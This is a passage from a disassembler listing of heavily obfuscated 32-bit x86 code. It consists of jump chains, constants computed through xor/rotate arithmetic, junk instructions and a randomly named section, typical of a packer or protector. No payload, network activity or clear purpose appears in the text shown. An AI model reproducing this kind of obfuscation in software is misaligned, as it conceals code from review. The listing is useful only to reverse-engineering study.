; END OF FUNCTION CHUNK	FOR sub_445CCD
; START	OF FUNCTION CHUNK FOR sub_441167

loc_44D932:				; CODE XREF: sub_441167:loc_4558CBj
					; sub_441167+14770j
		add	eax, ds:4000FAh
		test	eax, 10000000h
		jmp	loc_45891A
; END OF FUNCTION CHUNK	FOR sub_441167
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F8F2

loc_44D943:				; CODE XREF: sub_44F8F2-11054j
		adc	edx, esi
; END OF FUNCTION CHUNK	FOR sub_44F8F2
; START	OF FUNCTION CHUNK FOR sub_43D531

loc_44D945:				; CODE XREF: sub_43D531+4j
					; sub_44F8F2:loc_449C4Dj ...
		jmp	loc_45905C
; ---------------------------------------------------------------------------

loc_44D94A:				; CODE XREF: sub_44F8F2:loc_43AB62j
					; sub_43D531+C693j
		pop	ecx
		xchg	edx, [esp-4+arg_0]
		jmp	loc_44A53E
; END OF FUNCTION CHUNK	FOR sub_43D531
; ---------------------------------------------------------------------------

loc_44D953:				; CODE XREF: hvvrg7ie:0045AFBFj
		js	loc_450D35

loc_44D959:				; CODE XREF: hvvrg7ie:loc_43B6C7j
		mov	eax, [esp]
		call	sub_451703

loc_44D961:				; CODE XREF: hvvrg7ie:0043DFB8j
					; hvvrg7ie:00441CEAj
		xchg	eax, [esp]
		mov	edx, eax
		push	ecx
		call	sub_453D0F
; START	OF FUNCTION CHUNK FOR sub_44388C

loc_44D96C:				; CODE XREF: sub_44388C+15C16j
		jmp	loc_4437AD
; END OF FUNCTION CHUNK	FOR sub_44388C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450246

loc_44D971:				; CODE XREF: sub_450246+5ECDj
		jmp	sub_44059F
; END OF FUNCTION CHUNK	FOR sub_450246

; =============== S U B	R O U T	I N E =======================================



sub_44D976	proc near		; DATA XREF: sub_45889B+1C7Fo
		mov	eax, edx
		call	sub_441B65
		shl	eax, 11h
		mov	ebx, esi
		jmp	sub_456F6A
sub_44D976	endp

; ---------------------------------------------------------------------------

loc_44D987:				; CODE XREF: hvvrg7ie:0043BAABj
		jl	loc_44C57E

; =============== S U B	R O U T	I N E =======================================



sub_44D98D	proc near		; CODE XREF: sub_455B9C-792Ep

; FUNCTION CHUNK AT 0044CE07 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044E871 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00452D6A SIZE 00000019 BYTES
; FUNCTION CHUNK AT 004599E2 SIZE 0000000A BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		push	3F479717h
		pop	edi
		rol	edi, 0Bh
		jmp	loc_44E871
sub_44D98D	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E063

loc_44D99F:				; CODE XREF: sub_43E063+17F4Bj
		xor	edx, 9BF0DF48h
		rol	edx, 0Eh
		jnb	loc_43F5F8

loc_44D9AE:				; CODE XREF: sub_43B914+175F3j
		jmp	nullsub_249
; END OF FUNCTION CHUNK	FOR sub_43E063
; ---------------------------------------------------------------------------

loc_44D9B3:				; CODE XREF: hvvrg7ie:0044F737j
		jmp	loc_44E2BA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E128

loc_44D9B8:				; CODE XREF: sub_43E128+4EA4j
		jmp	loc_445BE0
; END OF FUNCTION CHUNK	FOR sub_43E128
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E6A5

loc_44D9BD:				; CODE XREF: sub_44E6A5-E6F7j
		jmp	nullsub_390
; END OF FUNCTION CHUNK	FOR sub_44E6A5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43AB99

loc_44D9C2:				; CODE XREF: sub_43AB99+366Aj
		jmp	loc_439388
; END OF FUNCTION CHUNK	FOR sub_43AB99
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443B00

loc_44D9C7:				; CODE XREF: sub_443B00-9BDAj
		jmp	loc_43E3C1
; END OF FUNCTION CHUNK	FOR sub_443B00
; ---------------------------------------------------------------------------
		sbb	edx, 0C9765071h
		jmp	loc_459197
; ---------------------------------------------------------------------------
		push	ecx
		push	3C144220h
		pop	ecx
		and	ecx, 4CE7DA36h
		xor	ecx, 0A645742Bh
		and	ecx, 96BBBE28h
		rol	ecx, 0Ch
		add	ecx, 0ECE147F4h
		jmp	loc_43B88C
; ---------------------------------------------------------------------------

loc_44D9FE:				; DATA XREF: sub_4395E7+C1E2o
		xor	eax, 2519568h
		call	sub_450C5A
		mov	ds:dword_41D180, eax
		lea	eax, nullsub_29
		jmp	loc_44C8DA

; =============== S U B	R O U T	I N E =======================================



sub_44DA1A	proc near		; CODE XREF: hvvrg7ie:00443CA6j
					; sub_450AA8:loc_45B73Ap

; FUNCTION CHUNK AT 0045B770 SIZE 00000017 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		lea	eax, [ebp-12Dh]
		push	eax
		push	ebx
		jmp	loc_45B770
sub_44DA1A	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BEBB

loc_44DA2B:				; CODE XREF: sub_44BEBB-5E4Ej
		pop	edi
		sub	edi, 0F8738388h
		or	edi, 0A69CA1EAh
		add	edi, 11A5348Eh
		xchg	edi, [esp+0]
		jmp	loc_45B345
; END OF FUNCTION CHUNK	FOR sub_44BEBB
; ---------------------------------------------------------------------------

loc_44DA46:				; CODE XREF: hvvrg7ie:00446E61j
		jno	loc_43D386
		xor	edi, 81943D8Dh	; DATA XREF: sub_44C2EA+2759o
		push	0F7A91B24h
		sub	ecx, 0CE6476E8h
		jmp	loc_45B365
; ---------------------------------------------------------------------------
		test	eax, eax
		jz	loc_44E9C9
		jmp	loc_44E495
; ---------------------------------------------------------------------------
		pop	eax
		mov	eax, [esp]
		push	edx
		push	esi
		push	0C27F5DC1h
		pop	esi
		rol	esi, 1Dh
		jmp	loc_4431F4
; ---------------------------------------------------------------------------

loc_44DA83:				; CODE XREF: hvvrg7ie:0043ECC0j
		jbe	loc_44E43F

; =============== S U B	R O U T	I N E =======================================



sub_44DA89	proc near		; CODE XREF: sub_452585-4D9Ap
		xchg	ecx, [esp+0]
		pop	ecx
		mov	[edx-18h], eax
		inc	dword ptr [ebp-4]
		jmp	loc_43E06D
sub_44DA89	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452585

loc_44DA98:				; CODE XREF: sub_452585:loc_4400B7j
		cmp	dword ptr [ebp-14h], 4
		jmp	loc_454F44
; END OF FUNCTION CHUNK	FOR sub_452585
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_89. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------

locret_44DAA2:				; CODE XREF: hvvrg7ie:loc_44E82Ej
		retn
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_133. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E533

loc_44DAA4:				; CODE XREF: sub_44E533+Cj
		jmp	loc_443E01
; END OF FUNCTION CHUNK	FOR sub_44E533
; ---------------------------------------------------------------------------

loc_44DAA9:				; CODE XREF: hvvrg7ie:0044DC67j
		jmp	loc_45994C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AAC8

loc_44DAAE:				; CODE XREF: sub_45AAC8-11B7Fj
		jz	loc_456440
		jmp	loc_44FBFC
; END OF FUNCTION CHUNK	FOR sub_45AAC8
; ---------------------------------------------------------------------------
		add	eax, 5D80452Eh
		cmp	ebp, 0AE77999Ah
		jmp	loc_4471C4
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_363. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CEC8

loc_44DACB:				; CODE XREF: sub_44CEC8+D6EAj
		jmp	loc_457A80
; END OF FUNCTION CHUNK	FOR sub_44CEC8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45541B

loc_44DAD0:				; CODE XREF: sub_45541B+13j
		jmp	loc_44338A
; END OF FUNCTION CHUNK	FOR sub_45541B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C811

loc_44DAD5:				; CODE XREF: sub_43C811+12E0j
					; sub_4554E8:loc_43EC4Ej
		sub	ebx, edx
		jmp	loc_4503D5
; ---------------------------------------------------------------------------

loc_44DADC:				; CODE XREF: sub_43C811+E865j
		sub	al, 99h
		push	0A01E2CCBh
		pop	edx
		xor	edx, 3E8ACDF4h
		or	edx, 0A3A4A422h
		rol	edx, 0Dh
		jmp	loc_4566C2
; END OF FUNCTION CHUNK	FOR sub_43C811
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43AC3B

loc_44DAF8:				; CODE XREF: sub_43AC3B:loc_4412CDj
		pop	eax
		sub	eax, 85944070h

loc_44DAFF:				; CODE XREF: sub_448BC0:loc_444ACCj
		add	eax, 0FCF8AC50h
		sub	eax, 78932A98h
		add	eax, 0DB787AD4h
		push	ecx
		jmp	loc_44D373
; END OF FUNCTION CHUNK	FOR sub_43AC3B
; ---------------------------------------------------------------------------
		js	loc_443E2F
		jmp	sub_442FD1
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_303. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_44DB23:				; CODE XREF: hvvrg7ie:0045A96Cj
		jmp	loc_43DD7A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4466A4

loc_44DB28:				; CODE XREF: sub_4466A4+6010j
		jmp	loc_454561
; END OF FUNCTION CHUNK	FOR sub_4466A4

; =============== S U B	R O U T	I N E =======================================



sub_44DB2D	proc near		; CODE XREF: hvvrg7ie:00452810j
					; sub_439B29:loc_452DA1p

arg_0		= dword	ptr  4

		xchg	eax, [esp+0]
		pop	eax
		xchg	ecx, [esp-4+arg_0]
		jmp	sub_44973C
sub_44DB2D	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443452

loc_44DB39:				; CODE XREF: sub_443452:loc_450E8Bj
		pop	esi
		call	sub_4435FA

loc_44DB3F:				; CODE XREF: sub_45943A:loc_439BB5j
					; sub_45943A-1932j
		sub	esi, 88B42CCAh
		add	esi, 87D69216h
; END OF FUNCTION CHUNK	FOR sub_443452
; START	OF FUNCTION CHUNK FOR sub_445934

loc_44DB4B:				; CODE XREF: sub_445934:loc_44F6EFj
		xchg	esi, [esp+0]
		jmp	nullsub_275
; END OF FUNCTION CHUNK	FOR sub_445934

; =============== S U B	R O U T	I N E =======================================



sub_44DB53	proc near		; DATA XREF: sub_44914D-1BACo

var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8

; FUNCTION CHUNK AT 0043E62B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00444084 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004512F4 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004517F9 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00452A25 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00456F0D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045888B SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00459032 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045B0FA SIZE 0000001A BYTES

		push	eax
		push	eax
		mov	edx, eax
		call	sub_456DE7
		call	sub_43A87E
		or	eax, eax
		jmp	loc_459032
sub_44DB53	endp

; ---------------------------------------------------------------------------

loc_44DB68:				; CODE XREF: hvvrg7ie:00457B6Fj
		mov	edx, ds:dword_447B60
		push	offset sub_445CB5
		jmp	locret_4422D1
; ---------------------------------------------------------------------------

loc_44DB78:				; CODE XREF: hvvrg7ie:00442AA3j
		jge	loc_443BD9
		popf
		jp	loc_43B734
		jmp	loc_4441C1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44646D

loc_44DB8A:				; CODE XREF: sub_44646D-5661j
		adc	ecx, eax
		ror	ebp, 0Ah
		jmp	loc_43ACC2
; END OF FUNCTION CHUNK	FOR sub_44646D
; ---------------------------------------------------------------------------

locret_44DB94:				; CODE XREF: hvvrg7ie:0043ECF6j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457F50

loc_44DB95:				; CODE XREF: sub_457F50-2B77j
		jmp	loc_43C4C5
; END OF FUNCTION CHUNK	FOR sub_457F50
; ---------------------------------------------------------------------------
		jl	loc_445824
		jmp	sub_441242

; =============== S U B	R O U T	I N E =======================================



sub_44DBA5	proc near		; CODE XREF: sub_4589D3-14BABj
		push	ebp

loc_44DBA6:				; CODE XREF: hvvrg7ie:loc_443E17j
		sub	esi, 5474614Eh
		add	esi, 3BAFF4B8h
		call	sub_44524C
sub_44DBA5	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_454099

loc_44DBB7:				; CODE XREF: sub_454099-118AFj
		jmp	loc_449FC3
; END OF FUNCTION CHUNK	FOR sub_454099
; ---------------------------------------------------------------------------

loc_44DBBC:				; CODE XREF: hvvrg7ie:0043B6C2j
		jmp	sub_439549
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B048

loc_44DBC1:				; CODE XREF: sub_45B048-1A377j
		jnz	loc_442548
		jmp	loc_45AC12
; END OF FUNCTION CHUNK	FOR sub_45B048
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A7E8

loc_44DBCC:				; CODE XREF: sub_45A7E8:loc_446D1Dj
		call	sub_446A88
; END OF FUNCTION CHUNK	FOR sub_45A7E8
; START	OF FUNCTION CHUNK FOR sub_44616F

loc_44DBD1:				; CODE XREF: sub_44616F+8564j
		jmp	sub_44DE0A
; END OF FUNCTION CHUNK	FOR sub_44616F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_296. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4421DE

loc_44DBD7:				; CODE XREF: sub_4421DE:loc_4577D0j
		call	sub_43E98F

loc_44DBDC:				; CODE XREF: hvvrg7ie:00455B3Bj
		jmp	loc_44C0E3
; END OF FUNCTION CHUNK	FOR sub_4421DE
; ---------------------------------------------------------------------------

locret_44DBE1:				; CODE XREF: hvvrg7ie:004493F8j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4447AC

loc_44DBE2:				; CODE XREF: sub_4447AC-B2CBj
		jmp	loc_448E2D
; END OF FUNCTION CHUNK	FOR sub_4447AC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_439FEE

loc_44DBE7:				; CODE XREF: sub_439FEE:loc_445237j
		sub	esi, 9C75C325h
		add	esi, 0B57A8C4Ah
		rol	esi, 1
		and	esi, 0C52537F8h
		xor	esi, 0A1C60484h
		add	eax, esi
		pop	esi
		jmp	loc_43E208
; END OF FUNCTION CHUNK	FOR sub_439FEE
; ---------------------------------------------------------------------------

loc_44DC09:				; CODE XREF: hvvrg7ie:0043EF0Ej
		ja	loc_444035
		shr	ebx, 1Eh
		xor	ebx, 86823953h
; START	OF FUNCTION CHUNK FOR sub_44ED23

loc_44DC18:				; CODE XREF: sub_44ED23:loc_43EEFDj
		xor	eax, 738E0589h
		add	eax, ebp
		add	eax, 34565676h
		call	sub_4422A8
; END OF FUNCTION CHUNK	FOR sub_44ED23
; START	OF FUNCTION CHUNK FOR sub_44D2F8

loc_44DC2B:				; CODE XREF: sub_44D2F8+698Dj
		jmp	loc_43A340
; END OF FUNCTION CHUNK	FOR sub_44D2F8
; ---------------------------------------------------------------------------

loc_44DC30:				; CODE XREF: hvvrg7ie:00447BFAj
		jmp	loc_4452FE
; ---------------------------------------------------------------------------

loc_44DC35:				; CODE XREF: hvvrg7ie:0045A2FBj
		and	edx, edi
; START	OF FUNCTION CHUNK FOR sub_451DFF

loc_44DC37:				; CODE XREF: sub_451DFF-281j
		xor	edi, 0F0AAE19Fh
		add	eax, edi
		pop	edi
		mov	ebx, [eax]
		push	eax
		mov	eax, edx
		jmp	loc_443946
; END OF FUNCTION CHUNK	FOR sub_451DFF
; ---------------------------------------------------------------------------

loc_44DC4A:				; DATA XREF: sub_445591+1409o
		mov	esp, ebp
		pop	ebp
		push	7802C0F3h
		pop	eax
		or	eax, 4642EB35h
		and	eax, 0B74FD5CDh
		add	eax, 0CA01CB2Fh
		mov	eax, [eax]
		jmp	loc_44DAA9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450FF2

loc_44DC6C:				; CODE XREF: sub_450FF2:loc_455D4Ej
		shl	eax, 8
		ja	loc_43FBDD
		cdq
		test	ebp, ecx
		jmp	loc_43C7FB
; END OF FUNCTION CHUNK	FOR sub_450FF2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446F26

loc_44DC7D:				; CODE XREF: sub_446F26-A395j
		pop	ecx
		and	ecx, 6561C3FBh
		rol	ecx, 4
		or	ecx, 0DADD7D53h
		jmp	loc_455CA6
; END OF FUNCTION CHUNK	FOR sub_446F26
; ---------------------------------------------------------------------------

loc_44DC92:				; CODE XREF: hvvrg7ie:0043F052j
		push	2F7C4F70h

loc_44DC97:				; CODE XREF: hvvrg7ie:0044F7B8j
		pop	eax
		or	eax, 0B8A57F7Ch
		add	eax, 40028135h
		call	sub_457C82
		jmp	loc_4414F7
; ---------------------------------------------------------------------------
		jmp	loc_441D60
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454099

loc_44DCB3:				; CODE XREF: sub_443375-9153j
					; sub_443375+Aj ...
		js	loc_444D4D
		cmp	dword ptr [ebp-10Ch], 76676264h
		jmp	loc_4523EF
; END OF FUNCTION CHUNK	FOR sub_454099
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_191. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4485A2

loc_44DCC9:				; CODE XREF: sub_4485A2:loc_4549A1j
		jmp	loc_439522
; END OF FUNCTION CHUNK	FOR sub_4485A2
; ---------------------------------------------------------------------------

loc_44DCCE:				; CODE XREF: hvvrg7ie:00448526j
		shr	eax, 1Eh
		jmp	loc_44486B
; ---------------------------------------------------------------------------
		mov	edx, 367536B5h
		jmp	sub_445D0D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45038B

loc_44DCE0:				; CODE XREF: sub_45038B-C50Cj
		sub	ebp, 3E11A804h
		jmp	loc_43BD58
; END OF FUNCTION CHUNK	FOR sub_45038B
; ---------------------------------------------------------------------------

loc_44DCEB:				; CODE XREF: hvvrg7ie:loc_44C877j
		push	0C0F6F43Bh
		pop	edx
		xor	edx, 4680A40Bh
		add	edx, 51E66DFFh
		add	edx, ebp
		jmp	loc_442254
; ---------------------------------------------------------------------------
		test	al, al
		jz	loc_43B8B9
		jmp	loc_43DDBB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4484E1

loc_44DD11:				; CODE XREF: sub_4484E1:loc_441EFBj
		add	eax, 0AA0D2F59h
		rol	eax, 12h
		jnb	loc_452705

loc_44DD20:				; CODE XREF: hvvrg7ie:0044A969j
		jmp	loc_43C073
; END OF FUNCTION CHUNK	FOR sub_4484E1
; ---------------------------------------------------------------------------
		and	ecx, edx
		jmp	loc_43C9C3
; ---------------------------------------------------------------------------

loc_44DD2C:				; CODE XREF: hvvrg7ie:0043B116j
		jg	loc_450249

loc_44DD32:				; CODE XREF: hvvrg7ie:loc_44E755j
		push	ecx
		mov	ecx, eax
		xchg	ecx, [esp]
		lea	eax, dword_43A978

; =============== S U B	R O U T	I N E =======================================



sub_44DD3E	proc near		; CODE XREF: sub_446B99-4F89j

var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043D669 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044502E SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0045B319 SIZE 0000001B BYTES

		push	ebp
		mov	ebp, eax
		xchg	ebp, [esp+4+var_4]
		jmp	loc_43D669
sub_44DD3E	endp

; ---------------------------------------------------------------------------

loc_44DD49:				; CODE XREF: hvvrg7ie:00450C08j
		xchg	ecx, [esp]
		push	ecx
		push	11DAD739h
		pop	ecx
		add	ecx, 0AB18EA5h
		xor	ecx, 0CFA38FF7h
		add	ecx, 2D157707h
		jmp	loc_442092
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450246

loc_44DD6A:				; CODE XREF: sub_450246:loc_447B55j
		jb	loc_43E47A
		jmp	loc_43D6D0
; END OF FUNCTION CHUNK	FOR sub_450246
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_216. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441DDD

loc_44DD76:				; CODE XREF: sub_441DDD+B14Dj
		jmp	loc_4584D6
; END OF FUNCTION CHUNK	FOR sub_441DDD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4465A6

loc_44DD7B:				; CODE XREF: sub_4465A6-A8A3j
		jmp	loc_4597E1
; END OF FUNCTION CHUNK	FOR sub_4465A6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4413A5

loc_44DD80:				; CODE XREF: sub_4413A5:loc_43C9EEj
		mov	ecx, edi
		pop	edi
		xor	eax, 4A987DD7h
		ror	eax, 1Eh
		sub	eax, 3B10982Dh
		mov	edx, [esp-8+arg_0]
		push	eax
		mov	eax, esi
		jmp	loc_441935
; END OF FUNCTION CHUNK	FOR sub_4413A5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458F7F

loc_44DD9D:				; CODE XREF: sub_458F7F:loc_441C46j
		push	0B158B8E0h
		pop	edi
		add	edi, 5C528868h
		or	edi, 0DBBDD291h
		add	edi, 2084490Fh
		xchg	edi, [esp+0]
		jmp	loc_452556
; END OF FUNCTION CHUNK	FOR sub_458F7F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_422. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_44DDBE:				; CODE XREF: hvvrg7ie:00458534j
		xor	ecx, ebx

loc_44DDC0:				; CODE XREF: hvvrg7ie:loc_458525j
		xor	edx, 0DED11B1Ah
		and	edx, 99AEA778h
		or	edx, 14F56601h
		jmp	loc_43C501
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BF37

loc_44DDD7:				; CODE XREF: hvvrg7ie:loc_441996j
					; sub_44BF37:loc_456379j
		popf
		xchg	esi, [esp-8+arg_4]
		jmp	sub_446A16
; END OF FUNCTION CHUNK	FOR sub_44BF37
; ---------------------------------------------------------------------------
		sub	ebx, ecx
		jmp	loc_448084
; ---------------------------------------------------------------------------

loc_44DDE7:				; CODE XREF: hvvrg7ie:00439C8Cj
		jz	loc_450871
		push	0FF450AEDh
		jmp	loc_4559F7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451F50

loc_44DDF7:				; CODE XREF: sub_451F50:loc_4440FEj
		inc	dword ptr [ebp-0Ch]
		jmp	loc_4503B2
; END OF FUNCTION CHUNK	FOR sub_451F50
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C9B0

loc_44DDFF:				; CODE XREF: sub_44C9B0-4473j
					; sub_44C9B0+16j
		inc	dword ptr [ebp-8]
		inc	dword ptr [ebp-0Ch]
		jmp	loc_442DE4
; END OF FUNCTION CHUNK	FOR sub_44C9B0

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_44DE0A	proc near		; CODE XREF: sub_43FEF7-6835j
					; hvvrg7ie:0043AA0Bp ...

var_14		= byte ptr -14h

; FUNCTION CHUNK AT 00440580 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004599AA SIZE 00000029 BYTES

		push	ebp
		mov	ebp, esp
		jno	sub_454703
		add	esp, 0FFFFFFECh
		mov	eax, offset dword_453878
		jmp	loc_4599AA
sub_44DE0A	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440C05

loc_44DE20:				; CODE XREF: sub_440C05-250Fj
		jle	loc_44064B
		push	ecx
		sbb	edi, 2A336273h
		adc	edx, 399F6118h

loc_44DE33:				; CODE XREF: sub_44646D:loc_4547C3j
		push	6DA80712h
		pop	eax
		or	eax, 22D9545Ch
		add	eax, 0E50B95D4h
		jmp	loc_453EB0
; END OF FUNCTION CHUNK	FOR sub_440C05
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4527A1

loc_44DE4A:				; CODE XREF: sub_4527A1:loc_453881j
		call	sub_43D47E

loc_44DE4F:				; CODE XREF: sub_448B78-9C80j
		jmp	loc_446343
; END OF FUNCTION CHUNK	FOR sub_4527A1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44432F

loc_44DE54:				; CODE XREF: sub_44432F+DF31j
		mov	eax, [eax]
		popf
		push	147DBA0Bh
		xchg	eax, [esp+4+var_4]
		mov	ecx, eax
		pop	eax
		jmp	loc_4495E1
; END OF FUNCTION CHUNK	FOR sub_44432F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454099

loc_44DE67:				; CODE XREF: sub_454099-1CAFj
		jns	loc_458A6F
		ror	esi, 18h

loc_44DE70:				; CODE XREF: sub_454099:loc_4523E2j
		add	edi, 0F5D1BF32h
		mov	[edi], eax
		jmp	loc_44CADA
; END OF FUNCTION CHUNK	FOR sub_454099
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453E08

loc_44DE7D:				; CODE XREF: sub_453E08-13007j
		or	edx, ebx
		cmp	esi, edx
		jmp	loc_445B7F
; END OF FUNCTION CHUNK	FOR sub_453E08
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4403D4

loc_44DE86:				; CODE XREF: sub_4403D4+16B54j
		ja	sub_447079
; END OF FUNCTION CHUNK	FOR sub_4403D4
; START	OF FUNCTION CHUNK FOR sub_45889B

loc_44DE8C:				; CODE XREF: sub_45889B:loc_45401Fj
		add	ebx, 0CD7A27FFh
		call	sub_44A01E
; END OF FUNCTION CHUNK	FOR sub_45889B
; START	OF FUNCTION CHUNK FOR sub_440B96

loc_44DE97:				; CODE XREF: sub_440B96+13j
		jmp	loc_457794
; END OF FUNCTION CHUNK	FOR sub_440B96
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B3FF

loc_44DE9C:				; CODE XREF: sub_45B3FF-1D3FBj
		jmp	loc_44BAA6
; END OF FUNCTION CHUNK	FOR sub_45B3FF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4533F2

loc_44DEA1:				; CODE XREF: sub_4533F2+8j
		jnb	loc_4401B5
		xor	eax, 0E9F8A129h
		ror	eax, 17h
		mov	edx, [esp+4+var_4]
		push	eax
		jmp	loc_43AFAC
; END OF FUNCTION CHUNK	FOR sub_4533F2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44388C

loc_44DEB9:				; CODE XREF: sub_44388C:loc_45064Dj
		add	eax, ebp

loc_44DEBB:				; CODE XREF: hvvrg7ie:0045AE71j
		push	edx
		push	85C19E6h
		pop	edx
		add	edx, ds:4000F2h
		rol	edx, 1Ah
		jmp	loc_444F11
; END OF FUNCTION CHUNK	FOR sub_44388C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BFF5

loc_44DED0:				; CODE XREF: sub_44BFF5:loc_446C6Dj
		or	edx, 0AFB10129h
		xor	edx, 2E62D58Ah
		add	edx, 2EACD474h
		push	offset sub_44E9E7
		jmp	loc_4467AD
; END OF FUNCTION CHUNK	FOR sub_44BFF5
; ---------------------------------------------------------------------------

loc_44DEEC:				; DATA XREF: sub_441FD1+9o
		add	eax, 253CD29Ah
		rol	eax, 0Fh
		xor	eax, 7114C82Eh
		push	esi
		push	330DF5E0h
		pop	esi
		sub	esi, 0D1861977h
		jmp	loc_44E8DA
; ---------------------------------------------------------------------------

loc_44DF0D:				; CODE XREF: hvvrg7ie:004441D7j
		rol	edi, 1Ah
		jz	loc_43C52D
		mov	eax, ebp

loc_44DF18:				; CODE XREF: hvvrg7ie:loc_4441CCj
					; hvvrg7ie:loc_4592C9j
		add	esi, 738F115Fh

loc_44DF1E:				; CODE XREF: hvvrg7ie:loc_44861Aj
		and	esi, 0F1154554h
		jmp	loc_45B8E1
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_335. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AFD7

loc_44DF2A:				; CODE XREF: sub_44AFD7+3118j
		jmp	loc_4482A1
; END OF FUNCTION CHUNK	FOR sub_44AFD7
; ---------------------------------------------------------------------------

loc_44DF2F:				; CODE XREF: hvvrg7ie:00441367j
		jmp	sub_453E08
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450AA8

loc_44DF34:				; CODE XREF: sub_450AA8+131j
		xchg	edi, [esp-4+arg_0]
		jmp	sub_450C5A
; END OF FUNCTION CHUNK	FOR sub_450AA8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441E23

loc_44DF3C:				; CODE XREF: sub_441E23-6E9Dj
		push	1FCDE8E1h
		xchg	edx, [esi]
		sbb	edx, 2A908CFEh

